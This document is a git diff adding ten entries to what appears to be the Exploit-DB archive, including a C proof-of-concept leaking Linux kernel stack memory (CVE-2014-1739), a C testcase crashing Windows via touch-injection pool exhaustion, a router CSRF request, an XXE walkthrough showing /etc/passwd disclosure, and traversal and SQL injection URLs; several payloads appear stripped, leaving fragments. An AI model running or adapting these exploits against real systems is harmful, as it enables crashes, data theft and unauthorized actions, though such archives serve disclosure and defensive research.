diff --git a/files.csv b/files.csv
index 5ed2506c6..0a159c0a8 100755
--- a/files.csv
+++ b/files.csv
@@ -35451,3 +35451,13 @@ id,file,description,date,author,platform,type,port
39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0
39203,platforms/lin_x86-64/shellcode/39203.c,"x86_64 Linux Egghunter - 18 bytes",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux x86 - Egg-hunter (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
+39205,platforms/multiple/remote/39205.txt,"Castor Library XML External Entity Information Disclosure Vulnerability",2014-05-27,"Ron Gutierrez",multiple,remote,0
+39206,platforms/php/webapps/39206.txt,"webEdition CMS 'we_fs.php' SQL Injection Vulnerability",2014-05-28,"RedTeam Pentesting GmbH",php,webapps,0
+39207,platforms/linux/local/39207.txt,"dpkg Source Package Index: pseudo-header Processing Multiple Local Directory Traversal Vulnerability",2014-05-25,"Raphael Geissert",linux,local,0
+39208,platforms/windows/dos/39208.c,"Microsoft Windows Touch Injection API Local Denial of Service Vulnerability",2014-05-22,"Tavis Ormandy",windows,dos,0
+39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router Cross Site Request Forgery Vulnerability",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
+39210,platforms/php/webapps/39210.txt,"Seo Panel 'file' Parameter Directory Traversal Vulnerability",2014-05-15,"Eric Sesterhenn",php,webapps,0
+39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0
+39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
+39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
+39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability",2014-05-28,"Salva Peiro",linux,local,0
diff --git a/platforms/hardware/remote/39209.txt b/platforms/hardware/remote/39209.txt
new file mode 100755
index 000000000..e9a4eefe8
--- /dev/null
+++ b/platforms/hardware/remote/39209.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/67747/info
+
+Huawei E303 Router is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+Huawei E303 Router running firmware versions CH2E303SM is vulnerable; other versions may also be affected.
+
+[Proof -of-concept HTTP POST request]:
+POST /api/sms/send-sms HTTP/1.1
+Host: hi.link
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://hi.link/
+Connection: keep-alive
+Content-Type: text/plain
+Content-Length: 225
+
+-14422
+Sample Text012013-12-03
+16:00:00
diff --git a/platforms/linux/local/39207.txt b/platforms/linux/local/39207.txt
new file mode 100755
index 000000000..66b1d717e
--- /dev/null
+++ b/platforms/linux/local/39207.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/67727/info
+
+dpkg is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow local attackers to modify files outside the destination directory and possibly gain access to the system.
+
+dpkg 1.3.0 is vulnerable; other versions may also be affected.
+
+,--- exploit.patch ---
+Index: index/symlink/index-file
+@@ -0,0 +1,1 @@
++Escaped
+`---
\ No newline at end of file
diff --git a/platforms/linux/local/39214.c b/platforms/linux/local/39214.c
new file mode 100755
index 000000000..1b0b00731
--- /dev/null
+++ b/platforms/linux/local/39214.c
@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/68048/info
+
+The Linux kernel is prone to a local information-disclosure vulnerability.
+
+Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.
+
+Linux kernel 2.6.38 through 3.15-rc2 are vulnerable.
+
+/*
+ * $File: media-enum-poc.c
+ * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.
+ * $Author: Salva Peiró (c) Copyright 2014.
+ * $URL: http://speirofr.appspot.com/files/media-enum-poc.c
+ * $License: GPLv2.
+ */
+
+#include
+#include
+#include
+#include
+
+#include
+#include
+#define MEDIA_DEV "/dev/media0"
+
+int main(int argc, char *argv[])
+{
+ struct media_entity_desc u_ent = {};
+ char *file = MEDIA_DEV;
+ int i, fd, ret;
+
+ if (argc > 1)
+ file = argv[1];
+ fd = open(file, O_RDONLY);
+ if (fd < 0){
+ perror("open " MEDIA_DEV);
+ return -1;
+ }
+
+ u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;
+ ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);
+ if (ret < 0){
+ perror("ioctl " MEDIA_DEV);
+ return -1;
+ }
+
+ printf("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:", sizeof(u_ent.reserved) + sizeof(u_ent.raw));
+ for (i = 0; i < 200/sizeof(uint32_t); i++) {
+ uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i);
+ if (i % 4 == 0)
+ printf("\n %08d: ", i);
+ printf("0x%08x ", data);
+ }
+ printf("\n");
+
+ return ret;
+}
+
+/*
+ gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */
diff --git a/platforms/multiple/remote/39205.txt b/platforms/multiple/remote/39205.txt
new file mode 100755
index 000000000..6a7c1066e
--- /dev/null
+++ b/platforms/multiple/remote/39205.txt
@@ -0,0 +1,108 @@
+source: http://www.securityfocus.com/bid/67676/info
+
+Castor Library is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks.
+
+Caster Library 1.3.3-RC1 and earlier are vulnerable.
+
+===========================================================
+Proof-of-Concept Code and Exploit
+===========================================================
+Now let’s look at how Castor handles unmarshalling calls to show how an
+application could be vulnerable:
+
+In this simple class, we create Person object:
+..snip..
+
+public class Person implements java.io.Serializable {
+
+/** The name of the person */
+ private String name = null;
+
+ /** The Date of birth */
+ private Date dob = null;
+
+ /** Creates a Person with no name */
+ public Person() {
+ super();
+ }
+
+ /** Creates a Person with the given name */
+ public Person(String name) { this.name = name; }
+
+..snip..
+
+Next, we generate a class that takes in external XML data to convert the
+XML document to a Person Object using the unmarshalling function:
+
+public static Person deserializePersonWithStatic(String xmlInput)
+{
+ StringReader xmlReader = new StringReader(xmlInput);
+
+ Person aPerson = null;
+ try
+ {
+ aPerson = (Person) Unmarshaller.unmarshal(Person.class,
+xmlReader);
+ }
+ catch (Exception e)
+ {
+ System.out.println("Failed to unmarshal the xml");
+ e.printStackTrace();
+ }
+
+ return aPerson;
+}
+
+
+If our application took in the XML data from a user controllable location
+and passed it through this unmarshalling function, the end user could use
+this functionality to view local resources on the application’s hosting
+server. For example, look at the following Servlet that takes in XML data
+from the Request:
+
+public class GeneratePerson extends HttpServlet {
+
+ public void doPost(HttpServletRequest req, HttpServletResponse res)
+ throws ServletException, IOException
+ {
+ String evilPersonXML = req.getParameter(“person”);
+
+ Person anotherPerson = deserializePersonWithStatic(evilPersonXML);
+
+ if(anotherPerson == null)
+ {
+ System.out.println("No Person Object set");
+ }
+ else
+ {
+ System.out.println("XXE Person name: " +
+anotherPerson.getName());
+ }
+
+What would happen if we passed the following string into the “person”
+request parameter value?:
+ ]
+&x3;
+
+The output would be the following:
+XXE Person name: ##
+# User Database
+#
+# Note that this file is consulted directly only when the system is running
+# in single-user mode. At other times this information is provided by
+# Open Directory.
+#
+# See the opendirectoryd(8) man page for additional information about
+# Open Directory.
+##
+nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
+root:*:0:0:System Administrator:/var/root:/bin/sh
+daemon:*:1:1:System Services:/var/root:/usr/bin/false
+..snip..
+
+As you can see, the unmarshalling function allowed external entities to be
+referenced and therefore the contents of the server’s /etc/passwd file was
+set within the “name” variable of the deserialized Person object.
diff --git a/platforms/php/webapps/39206.txt b/platforms/php/webapps/39206.txt
new file mode 100755
index 000000000..4ef5f8842
--- /dev/null
+++ b/platforms/php/webapps/39206.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67689/info
+
+webEdition CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+webEdition CMS 6.3.3.0 through 6.3.8.0 svn6985 are vulnerable; other versions may also be affected.
+
+ http://www.example.com/webEdition/we_fs.php?what=4[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/39210.txt b/platforms/php/webapps/39210.txt
new file mode 100755
index 000000000..c4636478b
--- /dev/null
+++ b/platforms/php/webapps/39210.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67911/info
+
+Seo Panel is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. Information obtained could aid in further attacks.
+
+Seo Panel 3.4.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/seopanel/download.php?file=/etc/purple/prefs.xml
\ No newline at end of file
diff --git a/platforms/php/webapps/39211.txt b/platforms/php/webapps/39211.txt
new file mode 100755
index 000000000..f0729986a
--- /dev/null
+++ b/platforms/php/webapps/39211.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/67934/info
+
+The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+
+
+
+
+
diff --git a/platforms/php/webapps/39212.txt b/platforms/php/webapps/39212.txt
new file mode 100755
index 000000000..686c0023c
--- /dev/null
+++ b/platforms/php/webapps/39212.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67954/info
+
+JW Player for Flash & HTML5 Video is a Plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+JW Player for Flash & HTML5 Video 2.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=jwp6_menu&player_id=1&action=delete
\ No newline at end of file
diff --git a/platforms/php/webapps/39213.txt b/platforms/php/webapps/39213.txt
new file mode 100755
index 000000000..67e7ea8b8
--- /dev/null
+++ b/platforms/php/webapps/39213.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/67955/info
+
+Featured Comments plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Featured Comments 1.2.1 is vulnerable; other versions may also be affected.
+
+
diff --git a/platforms/windows/dos/39208.c b/platforms/windows/dos/39208.c
new file mode 100755
index 000000000..21043be2d
--- /dev/null
+++ b/platforms/windows/dos/39208.c
@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/67742/info
+
+Microsoft Windows is prone to a local denial-of-service vulnerability.
+
+A local attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
+
+#ifndef WIN32_NO_STATUS
+# define WIN32_NO_STATUS
+#endif
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#ifdef WIN32_NO_STATUS
+# undef WIN32_NO_STATUS
+#endif
+#include
+
+#pragma comment(lib, "ntdll")
+#pragma comment(lib, "user32")
+#pragma comment(lib, "gdi32")
+#pragma comment(lib, "advapi32")
+
+// InitializeTouchInjection() Win8.1 Testcase
+// -- Tavis Ormandy , Feb 2014.
+
+int main(int argc, char **argv)
+{
+POINTER_TOUCH_INFO Contact;
+SID_AND_ATTRIBUTES SidToRestricted;
+ULONG Size;
+HANDLE Handle;
+
+ZeroMemory(&Contact, sizeof Contact);
+ZeroMemory(&SidToRestricted, sizeof SidToRestricted);
+
+// I *think* TOUCH_MASK_CONTACTAREA is required (i.e. rcContact), the rest
+// just need to be valid.
+Contact.pointerInfo.pointerType = PT_TOUCH;
+Contact.pointerInfo.pointerFlags = POINTER_FLAG_DOWN | POINTER_FLAG_INRANGE | POINTER_FLAG_INCONTACT;
+Contact.pointerInfo.ptPixelLocation.x = 'AAAA';
+Contact.pointerInfo.ptPixelLocation.y = 'AAAA';
+Contact.rcContact.left = 'AAAA';
+Contact.rcContact.right = 'AAAA';
+Contact.rcContact.top = 'AAAA';
+Contact.rcContact.bottom = 'AAAA';
+Contact.touchFlags = TOUCH_FLAG_NONE;
+Contact.touchMask = TOUCH_MASK_CONTACTAREA;
+Size = SECURITY_MAX_SID_SIZE;
+Handle = INVALID_HANDLE_VALUE;
+SidToRestricted.Sid = _alloca(Size);
+
+CreateWellKnownSid(WinNullSid, NULL, SidToRestricted.Sid, &Size);
+
+// This just exhausts available pool (how that's accomplished is irrelevant).
+for (Size = 1 << 26; Size; Size >>= 1) {
+while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
+;
+}
+
+for (;;) {
+// Initialize touch injection with very small number of contacts.
+InitializeTouchInjection(1, TOUCH_FEEDBACK_DEFAULT);
+
+// Now increase the number of contacts, which should (eventually) cause an allocation fail.
+InitializeTouchInjection(MAX_TOUCH_COUNT, TOUCH_FEEDBACK_DEFAULT);
+
+// I think this will just massage the pool, sequence found by fuzzing.
+OpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &Handle);
+CreateRestrictedToken(Handle, 0, 0, NULL, 0, NULL, 1, &SidToRestricted, &Handle);
+
+// Write something to the touch injection allocation.
+InjectTouchInput(1, &Contact);
+}
+
+return 0;
+}